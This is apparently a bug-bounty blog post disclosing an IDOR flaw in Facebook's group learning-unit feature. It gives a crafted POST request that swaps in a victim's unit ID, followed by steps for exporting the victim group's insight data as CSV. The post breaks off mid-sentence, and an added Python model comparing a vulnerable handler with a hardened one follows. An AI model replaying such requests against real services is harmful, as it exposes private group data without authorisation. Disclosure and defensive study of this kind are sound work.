
Showing posts from October, 2018

Disclose the Facebook Learning Unit Group Insight

There is an IDOR issue in a feature called learning unit which leads to disclosure of the Group Insight. If the targeted group's privacy is public, the attacker can disclose the group insight without becoming a member; for closed/secret group privacy, the attacker needs to become a member.

Steps:

1. Request

POST /groups/learning/edit_units_dialog/submit/
.....
group_id=Attacker_Group&description=&unit_ids[0]=Victim_Unit_ID

Response:

for (;;);{"__ar":1,"payload":null,"jsmods":{"require":[["ServerRedirect","reloadPage",[],[]]]},...

The victim unit should appear in the attacker's group.

2. The attacker goes to his group > group insight, requests a download of the group insight data (.csv format), and waits for the notification from Facebook that his data is ready to be downloaded.

3. From the browser, open a new tab and go to https://www.facebook.com/groups/Attacker_group_ID/completions_export/

4. The .csv file includi
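The server-side check that step 1 shows to be missing, as an added example that is not part of the original post and not Facebook's code: a constructed in-memory model in which the handler either trusts the submitted unit_ids or verifies each one against the group_id in the request. All class and function names are hypothetical.

```python
# Constructed in-memory model; names are hypothetical, not Facebook's code.
from dataclasses import dataclass, field

@dataclass
class Group:
    id: str
    admins: set
    unit_ids: list = field(default_factory=list)

@dataclass
class Unit:
    id: str
    owner_group_id: str  # group the unit was created in

class Forbidden(Exception):
    pass

def submit_units_vulnerable(actor, group, unit_ids, units):
    """Trusts client-supplied unit IDs: any existing unit can be attached."""
    if actor not in group.admins:
        raise Forbidden("actor cannot edit this group")
    group.unit_ids = [uid for uid in unit_ids if uid in units]
    return group.unit_ids

def submit_units_hardened(actor, group, unit_ids, units):
    """Checks every referenced unit against the group named in the request."""
    if actor not in group.admins:
        raise Forbidden("actor cannot edit this group")
    for uid in unit_ids:
        unit = units.get(uid)
        # Same error for "missing" and "foreign" so unit IDs cannot be probed.
        if unit is None or unit.owner_group_id != group.id:
            raise Forbidden("unit not available in this group")
    group.unit_ids = list(unit_ids)  # applied only if every ID passed
    return group.unit_ids

def demo():
    units = {"u_victim": Unit("u_victim", "g_victim"),
             "u_own": Unit("u_own", "g_attacker")}
    g = Group("g_attacker", admins={"mallory"})
    leaked = submit_units_vulnerable("mallory", g, ["u_victim"], units)
    g.unit_ids = []
    try:
        submit_units_hardened("mallory", g, ["u_own", "u_victim"], units)
        blocked = False
    except Forbidden:
        blocked = True
    return leaked, blocked, g.unit_ids
```

The hardened handler rejects the whole request when any single ID fails, so a foreign unit cannot ride along with legitimate ones.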